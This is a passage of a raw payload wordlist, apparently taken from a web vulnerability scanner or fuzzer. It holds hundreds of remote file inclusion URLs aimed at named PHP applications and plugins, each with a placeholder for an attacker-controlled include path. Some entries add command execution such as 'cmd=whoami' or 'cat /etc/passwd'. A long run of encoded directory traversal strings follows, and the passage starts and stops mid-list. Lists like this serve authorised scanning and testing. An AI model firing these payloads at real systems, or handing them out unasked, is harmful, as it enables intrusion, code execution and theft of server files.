n/sources/Admin/admin_import.php?CONFIG[main_path]=XXpathXX\n/sources/Admin/admin_templates.php?CONFIG[main_path]=XXpathXX\n/sources/functions.php?CONFIG[main_path]=XXpathXX\n/sources/help.php?CONFIG[main_path]=XXpathXX\n/sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=XXpathXX\n/sources/lostpw.php?FORM[set]=1&FORM[session_id]=1&CONFIG[path]=XXpathXX\n/sources/mail.php?CONFIG[main_path]=XXpathXX\n/sources/misc/new_day.php?path=XXpathXX\n/sources/news.php?CONFIG[main_path]=XXpathXX\n/sources/post.php?fil_config=XXpathXX\n/sources/template.php?CONFIG[main_path]=XXpathXX\n/sources/tourney/index.php?page=XXpathXX?\n/spaw/spaw_control.class.php?GLOBALS[spaw_root]=XXpathXX\n/spaw/spaw_control.class.php?spaw_root=XXpathXX\n/speedberg/include/entrancePage.tpl.php?SPEEDBERG_PATH=XXpathXX\n/speedberg/include/generalToolBox.tlb.php?SPEEDBERG_PATH=XXpathXX\n/speedberg/include/myToolBox.tlb.php?SPEEDBERG_PATH=XXpathXX\n/speedberg/include/scriplet.inc.php?SPEEDBERG_PATH=XXpathXX\n/speedberg/include/simplePage.tpl.php?SPEEDBERG_PATH=XXpathXX\n/speedberg/include/speedberg.class.php?SPEEDBERG_PATH=XXpathXX\n/speedberg/include/standardPage.tpl.php?SPEEDBERG_PATH=XXpathXX\n/spellcheckwindowframeset.php?SpellIncPath=XXpathXX\n/squirrelcart/cart_content.php?cart_isp_root=XXpathXX\n/src/ark_inc.php?cfg_pear_path=XXpathXX?\n/src/browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=XXpathXX\n/src/scripture.php?pageHeaderFile=XXpathXX?\n/starnet/themes/c-sky/main.inc.php?cmsdir=XXpathXX?\n/start.php?lang=XXpathXX\n/start.php?pg=XXpathXX\n/stat_modules/users_age/module.php?phpbb_root_path=XXpathXX\n/stats.php?vwar_root=XXpathXX\n/stphpapplication.php?STPHPLIB_DIR=XXpathXX\n/stphpbtnimage.php?STPHPLIB_DIR=XXpathXX\n/stphpform.php?STPHPLIB_DIR=XXpathXX\n/str.php?p=XXpathXX\n/streamline-1.0-beta4/src/core/theme/includes/account_footer.php?sl_theme_unix_path=XXpathXX\n/streamline-1.0-beta4/src/core/theme/includes/account_footer.php?sl_theme_unix_path=XXpathXX?\n/strload.php?LangFile=XXpathXX\n/studip-1.3.0-2/studip-htdocs/archiv_assi.php?cmd=ls%20-al&ABSOLUTE_PATH_STUDIP=XXpathXX?\n/studip-1.3.0-2/studip-phplib/oohforms.inc?cmd=ls%20-al&_PHPLIB[libdir]=XXpathXX?\n/styles.php?toroot=XXpathXX\n/styles/default/global_header.php?installed=23&domain=XXpathXX\n/submit_abuse.php?path_prefix=XXpathXX\n/submit_comment.php?path_prefix=XXpathXX\n/subscp.php?phpbb_root_path=XXpathXX?\n/suite/index.php?pg=XXpathXX?\n/supasite/admin_auth_cookies.php?supa[db_path]=XXpathXX\n/supasite/admin_mods.php?supa[db_path]=XXpathXX\n/supasite/admin_news.php?supa[db_path]=XXpathXX\n/supasite/admin_settings.php?supa[include_path]=XXpathXX\n/supasite/admin_topics.php?supa[db_path]=XXpathXX\n/supasite/admin_users.php?supa[db_path]=XXpathXX\n/supasite/admin_utilities.php?supa[db_path]=XXpathXX\n/supasite/backend_site.php?supa[include_path]=XXpathXX\n/supasite/common_functions.php?supa[db_path]=XXpathXX\n/supasite/site_comment.php?supa[db_path]=XXpathXX\n/supasite/site_news.php?supa[db_path]=XXpathXX\n/support/include/open_form.php?include_dir=XXpathXX?cmd=pwd\n/support/index.php?main=XXpathXX\n/surveys/survey.inc.php?path=XXpathXX\n/sw/lib_comment/comment.php?doc_directory=XXpathXX?\n/sw/lib_find/find.php?doc_directory=XXpathXX?\n/sw/lib_session/session.php?doc_directory=XXpathXX?\n/sw/lib_up_file/file.php?doc_directory=XXpathXX?\n/sw/lib_up_file/find_file.php?doc_directory=XXpathXX?\n/sw/lib_user/find_user.php?doc_directory=XXpathXX?\n/sw/lib_user/user.php?doc_directory=XXpathXX?\n/sys/code/box.inc.php?config[\"sipssys\"]=XXpathXX\n/system/ImageImageMagick.php?glConf[path_system]=XXpathXX?\n/system/_b/contentFiles/gBIndex.php?gBRootPath=XXpathXX?\n/system/admin/include/item_main.php?GLOBALS=XXpathXX\n/system/admin/include/upload_form.php?GLOBALS=XXpathXX\n/system/command/admin.cmd.php?GLOBALS=XXpathXX\n/system/command/download.cmd.php?GLOBALS=XXpathXX\n/system/funcs/xkurl.php?PEARPATH=XXpathXX\n/system/includes/pageheaderdefault.inc.php?_sysSessionPath=XXpathXX\n/system/login.php?site_path=XXpathXX\n/tagit2b/tagmin/delTagUser.php?configpath=XXpathXX?\n/tags.php?BBCodeFile=XXpathXX\n/taxonservice.php?dir=XXpathXX?\n/teatro/pub/pub08_comments.php?basePath=XXpathXX\n/technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=XXpathXX?\n/template.php?actionsPage=XXpathXX?\n/template.php?blog_theme=XXpathXX\n/template.php?pagina=XXpathXX\n/template/Noir/index.php?site_path=XXpathXX\n/template/Vert/index.php?pageAll=XXpathXX\n/template/Vert/index.php?site_path=XXpathXX\n/template/barnraiser_01/p_new_password.tpl.php?templatePath=XXpathXX\n/template/default/footer.php?ROOT_PATH=XXpathXX?cmd=ls\n/template/default/test/header.php?ROOT_PATH=XXpathXX?cmd=ls\n/template/gwb/user_bottom.php?config[template_path]=XXpathXX\n/template/purpletech/base_include.php?page=XXpathXX?\n/template/rwb/user_bottom.php?config[template_path]=XXpathXX\n/template_csv.php?rInfo[content]=XXpathXX\n/templates/2blue/bodyTemplate.php?serverPath=XXpathXX?\n/templates/Official/part_userprofile.php?template_path=XXpathXX\n/templates/barrel/template.tpl.php?renderer=XXpathXX\n/templates/barrel/template.tpl.php?renderer=XXpathXX?\n/templates/barry/template.tpl.php?renderer=XXpathXX\n/templates/be2004-2/index.php?mosConfig_absolute_path=XXpathXX\n/templates/datumVonDatumBis.inc.php?root=XXpathXX\n/templates/default/header.inc.php?menu=XXpathXX\n/templates/default/index_logged.php?main_loaded=1&cur_module=XXpathXX\n/templates/default/tpl_message.php?right_file=XXpathXX\n/templates/footer.inc.php?root=XXpathXX\n/templates/header.inc.php?root=XXpathXX\n/templates/mylook/template.tpl.php?renderer=XXpathXX\n/templates/oerdec/template.tpl.php?renderer=XXpathXX\n/templates/pb/language/lang_nl.php?temppath=XXpathXX\n/templates/penguin/template.tpl.php?renderer=XXpathXX\n/templates/sidebar/template.tpl.php?renderer=XXpathXX\n/templates/slashdot/template.tpl.php?renderer=XXpathXX\n/templates/stylesheets.php?root=XXpathXX\n/templates/text-only/template.tpl.php?renderer=XXpathXX\n/templates/tmpl_dfl/scripts/index.php?dir[inc]=XXpathXX\n/theme/breadcrumb.php?rootBase=XXpathXX?\n/theme/default.php?root=XXpathXX\n/theme/format.php?_page_content=XXpathXX?\n/theme/format.php?_page_css=XXpathXX?\n/theme/frames1.php?root=XXpathXX\n/theme/frames1_center.php?root=XXpathXX\n/theme/frames1_left.php?root=XXpathXX\n/theme/frames1_top.php?root=XXpathXX\n/theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=XXpathXX\n/theme/settings.php?pfad_z=XXpathXX\n/theme/test1.php?root=XXpathXX\n/theme/test2.php?root=XXpathXX\n/theme/test3.php?root=XXpathXX\n/theme/test4.php?root=XXpathXX\n/theme/test5.php?root=XXpathXX\n/theme/test6.php?root=XXpathXX\n/themes.php?GLOBALS[theme_path]=XXpathXX?\n/themes/blackorange.php?root=XXpathXX\n/themes/container.php?theme_directory=XXpathXX%00\n/themes/default/layouts/standard.php?page_include=XXpathXX?&act=cmd&cmd=whoami&d=/&submit=1&cmd_txt=1\n/themes/default/preview_post_completo.php?dir=XXpathXX\n/themes/header.php?theme_directory=XXpathXX%00\n/themes/ubb/login.php?theme=XXpathXX\n/themes/ubb/login.php?theme=XXpathXX?\n/thumbnail.php?module=gallery&GLOBALS[PTH][classes]=XXpathXX\n/tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title=XXpathXX\n/timedifference.php?la=XXpathXX\n/toolbar.loudmouth.php?mainframe=XXpathXX\n/tools/update_translations.php?_SESSION[path]=XXpathXX?\n/top.php?laypath=XXpathXX\n/toplist.php?f=toplist_top10&phpbb_root_path=XXpathXX\n/topsites/index.php?page=XXpathXX?&\n/towels-0.1/src/scripture.php?pageHeaderFile=XXpathXX\n/track.php?path=XXpathXX\n/tsep/include/colorswitch.php?tsep_config[absPath]=XXpathXX?\n/ttCMS_path/lib/db/ez_sql.php?lib_path=XXpathXX\n/twebs/modules/misc/usermods.php?ROOT=XXpathXX\n/ubbt.inc.php?GLOBALS[thispath]=XXpathXX?\n/unavailable.php?bibtexrootrel=XXpathXX?\n/unsubs.php?scdir=XXpathXX\n/up.php?my[root]=XXpathXX\n/upload.php?save_path=XXpathXX?\n/upload/admin/frontpage_right.php?loadadminpage=XXpathXX?\n/upload/top.php?maindir=XXpathXX?\n/upload/xax/admin/modules/install_module.php?level=XXpathXX?\n/upload/xax/admin/patch/index.php?level=XXpathXX?\n/upload/xax/ossigeno/admin/install_module.php?level=XXpathXX?\n/upload/xax/ossigeno/admin/uninstall_module.php?level=XXpathXX?\n/upload_local.php?target=XXpathXX?\n/upload_multi.php?target=XXpathXX?\n/urlinn_includes/config.php?dir_ws=XXpathXX?\n/user.php?caselist[bad_file.txt][path]=XXpathXX&command=cat%20/etc/passwd\n/user_language.php?INDM=r3d.w0rm&language_dir=XXpathXX?\n/user_new_2.php?home=XXpathXX\n/usr/extensions/get_calendar.inc.php?root_path=XXpathXX\n/usr/extensions/get_infochannel.inc.php?root_path=XXpathXX?cmd=id;pwd\n/usr/extensions/get_tree.inc.php?GLOBALS[root_path]=XXpathXX\n/utilitaires/gestion_sondage.php?repertoire_visiteur=XXpathXX\n/utils/class_HTTPRetriever.php?libcurlemuinc=XXpathXX\n/v-webmail/includes/mailaccess/pop3.php?CONFIG[pear_dir]=XXpathXX\n/vCard/admin/define.inc.php?match=XXpathXX?&cmd=id\n/vb/includes/functions.php?classfile=XXpathXX\n/vb/includes/functions_cron.php?nextitem=XXpathXX\n/vb/includes/functions_forumdisplay.php?specialtemplates=XXpathXX\n/vbgsitemap/vbgsitemap-config.php?base=XXpathXX\n/vbgsitemap/vbgsitemap-vbseo.php?base=XXpathXX\n/vedit/editor/edit_htmlarea.php?highlighter=XXpathXX?\n/viart_cms-3.3.2/blocks/block_site_map.php?root_folder_path=XXpathXX?\n/view.php?ariadne=XXpathXX?\n/view.php?id=XXpathXX\n/view_func.php?i=XXpathXX&l=testfile.txt?\n/views/print/printbar.php?views_path=XXpathXX\n/visible_count_inc.php?statitpath=XXpathXX\n/visitor.php?_SERVER[DOCUMENT_ROOT]=XXpathXX??\n/volume.php?config[public_dir]=XXpathXX?\n/vote.php?Madoa=XXpathXX?\n/votebox.php?VoteBoxPath=XXpathXX\n/vp/configure.php?phpbb_root_path=XXpathXX?\n/vwebmail/includes/mailaccess/pop3/core.php?CONFIG[pear_dir]=XXpathXX\n/w-agora_path/add_user.php?bn_dir_default=XXpathXX?\n/w-agora_path/create_forum.php?bn_dir_default=XXpathXX?\n/w-agora_path/create_user.php?bn_dir_default=XXpathXX?\n/w-agora_path/delete_notes.php?bn_dir_default=XXpathXX?\n/w-agora_path/delete_user.php?bn_dir_default=XXpathXX?\n/w-agora_path/edit_forum.php?bn_dir_default=XXpathXX?\n/w-agora_path/mail_users.php?bn_dir_default=XXpathXX?\n/w-agora_path/moderate_notes.php?bn_dir_default=XXpathXX?\n/w-agora_path/reorder_forums.php?bn_dir_default=XXpathXX?\n/wamp_dir/setup/yesno.phtml?no_url=XXpathXX?\n/wapchat/src/eng.adCreate.php?sysFileDir=XXpathXX\n/wapchat/src/eng.adCreateSave.php?sysFileDir=XXpathXX\n/wapchat/src/eng.adDispByTypeOptions.php?sysFileDir=XXpathXX\n/wapchat/src/eng.createRoom.php?sysFileDir=XXpathXX\n/wapchat/src/eng.forward.php?sysFileDir=XXpathXX\n/wapchat/src/eng.pageLogout.php?sysFileDir=XXpathXX\n/wapchat/src/eng.resultMember.php?sysFileDir=XXpathXX\n/wapchat/src/eng.roomDeleteConfirm.php?sysFileDir=XXpathXX\n/wapchat/src/eng.saveNewRoom.php?sysFileDir=XXpathXX\n/wapchat/src/eng.searchMember.php?sysFileDir=XXpathXX\n/wapchat/src/eng.writeMsg.php?sysFileDir=XXpathXX\n/war.php?vwar_root=XXpathXX\n/warn.php?file=XXpathXX\n/watermark.php?GALLERY_BASEDIR=XXpathXX\n/wbxml/WBXML/Decoder.php?base_dir=XXpathXX\n/wbxml/WBXML/Encoder.php?base_dir=XXpathXX\n/web/Administration/Includes/configureText.php?path_prefix=XXpathXX\n/web/Administration/Includes/contentHome.php?path_prefix=XXpathXX\n/web/Administration/Includes/deleteContent.php?path_prefix=XXpathXX\n/web/Administration/Includes/deleteUser.php?path_prefix=XXpathXX\n/web/Administration/Includes/userHome.php?path_prefix=XXpathXX\n/web/BetaBlockModules//Module/Module.php?path_prefix=XXpathXX\n/web/BetaBlockModules/AboutUserModule/AboutUserModule.php?path_prefix=XXpathXX\n/web/BetaBlockModules/AddGroupModule/AddGroupModule.php?path_prefix=XXpathXX\n/web/BetaBlockModules/AddMessageModule/AddMessageModule.php?path_prefix=XXpathXX\n/web/BetaBlockModules/AudiosMediaGalleryModule/AudiosMediaGalleryModule.php?current_blockmodule_pathXXpathXX\n/web/BetaBlockModules/CustomizeUIModule/desktop_image.php?path_prefix=XXpathXX\n/web/BetaBlockModules/EditProfileModule/DynamicProfile.php?path_prefix=XXpathXX\n/web/BetaBlockModules/EditProfileModule/external.php?path_prefix=XXpathXX\n/web/BetaBlockModules/EnableModule/EnableModule.php?path_prefix=XXpathXX\n/web/BetaBlockModules/ExternalFeedModule/ExternalFeedModule.php?path_prefix=XXpathXX\n/web/BetaBlockModules/FlickrModule/FlickrModule.php?path_prefix=XXpathXX\n/web/BetaBlockModules/GroupForumModule/GroupForumModule.php?path_prefixXXpathXX\n/web/BetaBlockModules/GroupForumPermalinkModule/GroupForumPermalinkModule.php?path_prefix=XXpathXX\n/web/BetaBlockModules/GroupModerateContentModule/GroupModerateContentModule.php?path_prefix=XXpathXX\n/web/BetaBlockModules/GroupModerateUserModule/GroupModerateUserModule.php?path_prefix=XXpathXX\n/web/BetaBlockModules/GroupModerationModule/GroupModerationModule.php?path_prefix=XXpathXX\n/web/BetaBlockModules/GroupsCategoryModule/GroupsCategoryModule.php?path_prefix=XXpathXX\n/web/BetaBlockModules/GroupsDirectoryModule/GroupsDirectoryModule.php?path_prefix=XXpathXX\n/web/BetaBlockModules/ImagesMediaGalleryModule/ImagesMediaGalleryModule.php?current_blockmodule_pathXXpathXX\n/web/BetaBlockModules/ImagesModule/ImagesModule.php?path_prefix=XXpathXX\n/web/BetaBlockModules/InvitationStatusModule/InvitationStatusModule.php?path_prefix=XXpathXX\n/web/BetaBlockModules/LargestGroupsModule/LargestGroupsModule.php?path_prefix=XXpathXX\n/web/BetaBlockModules/LinksModule/LinksModule.php?path_prefix=XXpathXX\n/web/BetaBlockModules/LoginModule/remoteauth_functions.php?path_prefix=XXpathXX\n/web/BetaBlockModules/LogoModule/LogoModule.php?path_prefix=XXpathXX\n/web/BetaBlockModules/MediaFullViewModule/MediaFullViewModule.php?path_prefix=XXpathXX\n/web/BetaBlockModules/MediaManagementModule/MediaManagementModule.php?path_prefix=XXpathXX\n/web/BetaBlockModules/MembersFacewallModule/MembersFacewallModule.php?current_blockmodule_pathXXpathXX\n/web/BetaBlockModules/MessageModule/MessageModule.php?path_prefix=XXpathXX\n/web/BetaBlockModules/ModuleSelectorModule/ModuleSelectorModule.php?path_prefix=XXpathXX\n/web/BetaBlockModules/MyGroupsModule/MyGroupsModule.php?path_prefix=XXpathXX\n/web/BetaBlockModules/MyLinksModule/MyLinksModule.php?path_prefix=XXpathXX\n/web/BetaBlockModules/MyNetworksModule.php?path_prefix=XXpathXX\n/web/BetaBlockModules/NetworkAnnouncementModule/NetworkAnnouncementModule.php?path_prefix=XXpathXX\n/web/BetaBlockModules/NetworkDefaultControlModule/NetworkDefaultControlModule.php?path_prefix=XXpathXX\n/web/BetaBlockModules/NetworkDefaultLinksModule/NetworkDefaultLinksModule.php?path_prefix=XXpathXX\n/web/BetaBlockModules/NetworkModerateUserModule/NetworkModerateUserModule.php?path_prefix=XXpathXX\n/web/BetaBlockModules/NetworkResultContentModule/NetworkResultContentModule.php?path_prefix=XXpathXX\n/web/BetaBlockModules/NetworkResultUserModule/NetworkResultUserModule.php?path_prefix=XXpathXX\n/web/BetaBlockModules/NetworksDirectoryModule/NetworksDirectoryModule.php?path_prefix=XXpathXX\n/web/BetaBlockModules/NewestGroupsModule/NewestGroupsModule.php?current_blockmodule_pathXXpathXX\n/web/BetaBlockModules/PeopleModule/PeopleModule.php?path_prefix=XXpathXX\n/web/BetaBlockModules/PopularTagsModule/PopularTagsModule.php?path_prefix=XXpathXX\n/web/BetaBlockModules/PostContentModule/PostContentModule.php?path_prefix=XXpathXX\n/web/BetaBlockModules/ProfileFeedModule/ProfileFeedModule.php?path_prefix=XXpathXX\n/web/BetaBlockModules/RecentCommentsModule/RecentCommentsModule.php?path_prefix=XXpathXX\n/web/BetaBlockModules/RecentPostModule/RecentPostModule.php?path_prefix=XXpathXX\n/web/BetaBlockModules/RecentTagsModule/RecentTagsModule.php?path_prefix=XXpathXX\n/web/BetaBlockModules/RegisterModule/RegisterModule.php?path_prefix=XXpathXX\n/web/BetaBlockModules/SearchGroupsModule/SearchGroupsModule.php?path_prefix=XXpathXX\n/web/BetaBlockModules/ShowAnnouncementModule/ShowAnnouncementModule.php?path_prefix=XXpathXX\n/web/BetaBlockModules/ShowContentModule/ShowContentModule.php?path_prefix=XXpathXX\n/web/BetaBlockModules/TakerATourModule/TakerATourModule.php?path_prefix=XXpathXX\n/web/BetaBlockModules/UploadMediaModule/UploadMediaModule.php?current_blockmodule_pathXXpathXX\n/web/BetaBlockModules/UserMessagesModule/UserMessagesModule.php?path_prefix=XXpathXX\n/web/BetaBlockModules/UserPhotoModule/UserPhotoModule.php?path_prefix=XXpathXX\n/web/BetaBlockModules/VideosMediaGalleryModule/VideosMediaGalleryModule.php?current_blockmodule_pathXXpathXX\n/web/BetaBlockModules/ViewAllMembersModule/ViewAllMembersModule.php?path_prefix=XXpathXX\n/web/Flickrclient.php?path_prefix=XXpathXX\n/web/help.php?LIBSDIR=XXpathXX\n/web/includes/blogger.php?path_prefix=XXpathXX\n/web/includes/functions/auto_email_notify.php?path_prefix=XXpathXX\n/web/includes/functions/html_generate.php?path_prefix=XXpathXX\n/web/includes/functions/validations.php?path_prefix=XXpathXX\n/web/index.php?LIBSDIR=XXpathXX\n/web/lib/xml/oai/ListRecords.php?xml_dir=XXpathXX\n/web/login.php?LIBSDIR=XXpathXX\n/web/logout.php?LIBSDIR=XXpathXX\n/web/lom.php?ETCDIR=XXpathXX\n/web/network_module_selector.php?path_prefix=XXpathXX\n/web/submit_abuse.php?path_prefix=XXpathXX\n/web/submit_comment.php?path_prefix=XXpathXX\n/webavis/class/class.php?root=XXpathXX?\n/webmail/includes/mailaccess/pop3/core.php?CONFIG[pear_dir]=XXpathXX\n/webnews/template.php?content_page=XXpathXX?\n/webroot/css.php?CONFIGS=XXpathXX\n/webyep-system/program/lib/WYURL.php?webyep_sIncludePath=XXpathXX\n/webyep-system/programm/webyep.php?webyep_sIncludePath=XXpathXX?\n/window.php?action=XXpathXX\n/wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=XXpathXX?\n/work/index.php?g_include=XXpathXX\n/work/module/forum/forum.php?g_include=XXpathXX\n/worldpay_notify.php?mosConfig_absolute_path=XXpathXX\n/wp-cache-phase1.php?plugin=XXpathXX\n/wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=XXpathXX\n/wp-content/plugins/myflash/myflash-button.php?wpPATH=XXpathXX\n/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=XXpathXX\n/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=XXpathXX\n/wp-content/plugins/wp-table/js/wptable-button.phpp?wpPATH=XXpathXX?\n/wsk/wsk.php?wsk=XXpathXX\n/xarg_corner.php?xarg=XXpathXX?\n/xarg_corner_bottom.php?xarg=XXpathXX?\n/xarg_corner_top.php?xarg=XXpathXX?\n/xoopsgallery/init_basic.php?GALLERY_BASEDIR=XXpathXX?&2093085906=1&995617320=2\n/xt_counter.php?server_base_dir=XXpathXX\n/yabbse/Sources/Packages.php?sourcedir=XXpathXX\n/yacs/scripts/update_trailer.php?context[path_to_root]=XXpathXX?\n/yrch/plugins/metasearch/plug.inc.php?path=XXpathXX\n/ytb/cuenta/cuerpo.php?base_archivo=XXpathXX\n/zipndownload.php?PP_PATH=XXpathXX?\n/zoomstats/libs/dbmax/mysql.php?GLOBALS['lib']['db']['path']=XXpathXX?\n/../{FILE}\n/../../{FILE}\n/../../../{FILE}\n/../../../../{FILE}\n/../../../../../{FILE}\n/../../../../../../{FILE}\n/../../../../../../../{FILE}\n/../../../../../../../../{FILE}\n/..%2f{FILE}\n/..%2f..%2f{FILE}\n/..%2f..%2f..%2f{FILE}\n/..%2f..%2f..%2f..%2f{FILE}\n/..%2f..%2f..%2f..%2f..%2f{FILE}\n/..%2f..%2f..%2f..%2f..%2f..%2f{FILE}\n/..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}\n/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}\n/%2e%2e/{FILE}\n/%2e%2e/%2e%2e/{FILE}\n/%2e%2e/%2e%2e/%2e%2e/{FILE}\n/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}\n/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}\n/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}\n/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}\n/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}\n/%2e%2e%2f{FILE}\n/%2e%2e%2f%2e%2e%2f{FILE}\n/%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}\n/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}\n/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}\n/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}\n/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}\n/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}\n/..%252f{FILE}\n/..%252f..%252f{FILE}\n/..%252f..%252f..%252f{FILE}\n/..%252f..%252f..%252f..%252f{FILE}\n/..%252f..%252f..%252f..%252f..%252f{FILE}\n/..%252f..%252f..%252f..%252f..%252f..%252f{FILE}\n/..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}\n/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}\n/%252e%252e/{FILE}\n/%252e%252e/%252e%252e/{FILE}\n/%252e%252e/%252e%252e/%252e%252e/{FILE}\n/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}\n/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}\n/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}\n/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}\n/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}\n/%252e%252e%252f{FILE}\n/%252e%252e%252f%252e%252e%252f{FILE}\n/%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}\n/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}\n/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}\n/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}\n/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}\n/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}\n/..\\{FILE}\n/..\\..\\{FILE}\n/..\\..\\..\\{FILE}\n/..\\..\\..\\..\\{FILE}\n/..\\..\\..\\..\\..\\{FILE}\n/..\\..\\..\\..\\..\\..\\{FILE}\n/..\\..\\..\\..\\..\\..\\..\\{FILE}\n/..\\..\\..\\..\\..\\..\\..\\..\\{FILE}\n/..%255c{FILE}\n/..%255c..%255c{FILE}\n/..%255c..%255c..%255c{FILE}\n/..%255c..%255c..%255c..%255c{FILE}\n/..%255c..%255c..%255c..%255c..%255c{FILE}\n/..%255c..%255c..%255c..%255c..%255c..%255c{FILE}\n/..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}\n/..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}\n/..%5c..%5c{FILE}\n/..%5c..%5c..%5c{FILE}\n/..%5c..%5c..%5c..%5c{FILE}\n/..%5c..%5c..%5c..%5c..%5c{FILE}\n/..%5c..%5c..%5c..%5c..%5c..%5c{FILE}\n/..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}\n/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}\n/%2e%2e\\{FILE}\n/%2e%2e\\%2e%2e\\{FILE}\n/%2e%2e\\%2e%2e\\%2e%2e\\{FILE}\n/%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}\n/%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}\n/%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}\n/%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}\n/%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}\n/%2e%2e%5c{FILE}\n/%2e%2e%5c%2e%2e%5c{FILE}\n/%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}\n/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}\n/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}\n/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}\n/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}\n/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}\n/%252e%252e\\{FILE}\n/%252e%252e\\%252e%252e\\{FILE}\n/%252e%252e\\%252e%252e\\%252e%252e\\{FILE}\n/%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}\n/%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}\n/%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}\n/%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}\n/%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}\n/%252e%252e%255c{FILE}\n/%252e%252e%255c%252e%252e%255c{FILE}\n/%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}\n/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}\n/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}\n/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}\n/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}\n/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}\n/..%c0%af{FILE}\n/..%c0%af..%c0%af{FILE}\n/..%c0%af..%c0%af..%c0%af{FILE}\n/..%c0%af..%c0%af..%c0%af..%c0%af{FILE}\n/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}\n/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}\n/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}\n/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}\n/%c0%ae%c0%ae/{FILE}\n/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}\n/%c0